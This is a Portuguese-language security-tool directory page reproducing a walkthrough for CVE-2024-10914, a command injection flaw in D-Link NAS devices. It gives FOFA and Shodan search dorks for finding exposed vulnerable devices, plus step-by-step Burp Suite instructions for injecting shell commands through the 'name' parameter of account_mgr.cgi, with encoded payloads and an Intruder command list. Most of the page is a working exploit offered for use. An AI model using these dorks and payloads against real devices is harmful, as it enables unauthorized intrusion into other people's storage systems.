Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10914 — CVE-2024-10914_Teste manual com burpsuite | Kitploit
Ferramentas/GitHubGitHub/egi08/cve-2024-10914
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoComando e Controle
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_Teste manual com burpsuite

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-10914 Teste de Vulnerabilidade de Injeção de Comandos para D-Link NAS_Teste manual com burpsuite


Dork para Encontrar Dispositivos Vulneráveis

Use o seguinte dork de pesquisa para encontrar dispositivos D-Link NAS potencialmente vulneráveis:

root@kitploit:~

FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

Essa string de pesquisa ajuda a identificar dispositivos que executam o aplicativo vulnerável D-Link DNS ShareCenter com a versão específica do servidor Lighttpd afetada pela vulnerabilidade.


Este guia fornece instruções passo a passo sobre como testar manualmente uma Vulnerabilidade de Injeção de Comandos (CVE-2024-10914) no parâmetro name do D-Link NAS usando o Burp Suite. URL alvo: http://Target.

Pré-requisitos

  • Burp Suite
  • Um navegador da web configurado para usar o Burp Suite como proxy (normalmente definido para 127.0.0.1:8080)

Passo 1: Configurar o Burp Suite

Baixar ferramenta
  1. Inicie o Burp Suite: Inicie o Burp Suite na sua máquina.
  2. Configure o proxy: Certifique-se de que seu navegador esteja configurado para usar o Burp Suite como proxy, definindo as configurações de proxy do navegador para 127.0.0.1 na porta 8080.

Passo 2: Interceptar a Solicitação

  1. Navegue até o alvo: No seu navegador, acesse http://Target.
  2. Ative o Intercept: No Burp Suite, ative o recurso de interceptação para capturar a solicitação de saída.

Passo 3: Modificar a Solicitação

  1. Localize o parâmetro vulnerável: Na solicitação interceptada, encontre o parâmetro name na URL. Ele deve aparecer como:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. Injete um comando de teste: Modifique o parâmetro name para incluir um comando de teste como echo "test":

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. Envie a solicitação modificada: Encaminhe a solicitação modificada para o servidor.


Passo 4: Analisar a Resposta

  1. Verifique a resposta: Procure pela saída do comando injetado na resposta. Por exemplo, se o servidor executou echo "test", você deve ver:

    root@kitploit:~
    test
    

Passo 5: Explorar a Vulnerabilidade

  1. Injete um comando malicioso: Se o teste for bem-sucedido, tente comandos mais sofisticados, como:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. Envie a solicitação de exploração: Encaminhe essa solicitação para o servidor.

  3. Analise a resposta: Verifique se a saída do comando (por exemplo, informações de ID do usuário) está presente na resposta.


Passo 6: Automatizar com Extensões do Burp Suite (Opcional)

  1. Use o Intruder: Automatize os testes com a ferramenta Intruder do Burp Suite.

    • Clique com o botão direito na solicitação e selecione Send to Intruder.
    • Defina o parâmetro name como a posição do payload.
    • Use uma lista de comandos como payloads para teste.
  2. Exemplos de Payloads:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Inicie o Intruder: Execute o ataque do Intruder para testar vários payloads automaticamente.